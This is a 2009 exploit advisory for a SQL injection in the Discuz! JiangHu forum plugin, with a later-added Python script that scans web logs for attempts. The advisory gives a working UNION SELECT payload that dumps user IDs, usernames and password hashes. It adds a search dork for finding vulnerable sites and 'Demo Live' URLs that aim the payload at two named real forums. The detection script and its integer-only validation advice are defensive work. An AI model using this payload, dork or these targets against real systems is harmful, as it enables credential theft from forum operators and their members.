Discuz! JiangHu plugin versions 1.1 and below remote SQL injection

2009.09.11
Credit: ZhaoHuAn
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

=========================================================
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================
[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog    : http://www.patching.net/zhaohuan/
[+] Date    : Feb, 9th 2009
[+] Update  : Sep, 1st 2009

========================[Soft Info]======================
Software: Discuz! Plugin JiangHu Inn
Version : 1.1
Vendor  : http://www.discuz.com
d0rk    : inurl:forummission.php

[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--
[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

/---------------------------------------------www.zhaohuan.net-------------------------------------------------\
Greetz : Snda Security Team & Normal is boring - -!
\--------------------------------------------------------------------------------------------------------------/
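For forum operators reviewing web server logs, the following is an added detection example and is not part of the original advisory or the plugin's code. It flags requests to forummission.php whose id parameter is not a plain integer. It assumes a legitimate id is always decimal digits (as in id=24 above) and that logs use the common/combined format; the log lines and the names classify and scan are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (combined format); IPs are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Sep/2009:10:00:01 +0000] "GET /bbs/forummission.php?index=show&id=24 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Sep/2009:10:00:07 +0000] "GET /bbs/forummission.php?index=show&id=24+and+1=2+union+select+1,2,3+from+cdb_members-- HTTP/1.1" 200 9034',
    '198.51.100.7 - - [11/Sep/2009:10:01:12 +0000] "GET /forummission.php?index=show&id=24%20AND%201=2%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 8710',
    '203.0.113.9 - - [11/Sep/2009:10:02:30 +0000] "GET /forum/forummission.php?index=show&id=24 and+1=2+union/**/select+1,2,3-- HTTP/1.0" 200 8712',
    '192.0.2.61 - - [11/Sep/2009:10:03:02 +0000] "GET /bbs/forummission.php?index=show&id=24\' HTTP/1.1" 200 312',
    '192.0.2.70 - - [11/Sep/2009:10:04:40 +0000] "GET /bbs/index.php?id=abc HTTP/1.1" 200 4000',
]

# The greedy target group tolerates a raw space inside the URL, as in the PoC string.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.+) HTTP/[\d.]+"')
# Checked after URL decoding, so '+', %20 and /**/ between keywords are all covered.
SQLI_RE = re.compile(r"\bunion\b.+\bselect\b|cdb_members", re.I | re.S)


def classify(line):
    """Return (client_ip, reason) for a suspicious forummission.php request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.lower().endswith("/forummission.php"):
        return None  # other scripts are out of scope for this check
    # dict() keeps the last value of a repeated parameter, as PHP does.
    params = dict(parse_qsl(query, keep_blank_values=True))
    value = params.get("id")
    if value is None or re.fullmatch(r"[0-9]+", value):
        return None  # assumption: a legitimate id is a decimal integer
    reason = "sqli-union" if SQLI_RE.search(value) else "non-numeric-id"
    return m.group("ip"), reason


def scan(lines):
    """Classify every line and keep only the flagged ones, in log order."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(ip, reason)
```

The same integer-only rule applied server-side to id before it reaches the query is what closes a CWE-89 flaw of this kind; log matching only shows who has already probed it.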

